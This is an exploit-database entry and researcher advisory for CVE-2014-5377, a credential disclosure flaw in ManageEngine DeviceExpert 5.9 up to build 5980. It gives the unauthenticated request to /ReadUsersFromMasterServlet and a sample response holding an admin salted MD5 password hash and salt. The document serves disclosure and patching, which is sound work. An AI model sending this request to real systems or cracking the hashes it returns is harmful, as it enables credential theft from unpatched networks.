User credential disclosure in ManageEngine DeviceExpert 5.9

vendor:

DeviceExpert

by:

Pedro Ribeiro

7,5

CVSS

HIGH

User credential disclosure

200

CWE

Product Name: DeviceExpert

Affected Version From: 5.9

Affected Version To: 5.9 build 5980

Patch Exists: YES

Related CWE: CVE-2014-5377

CPE: a:manageengine:deviceexpert:5.9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

User credential disclosure in ManageEngine DeviceExpert 5.9

DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. A vulnerability was discovered in the product which allowed for user credential disclosure without any authentication or other information needed. The passwords are a salted MD5 hash. Affected versions are UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable.

Mitigation:

Update to the latest version of the product to fix the vulnerability.

Source

Exploit-DB raw data:

>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================

>> Background on the affected product:
"DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."


>> Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable

GET /ReadUsersFromMasterServlet

Example response:
<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>

The passwords are a salted MD5 hash.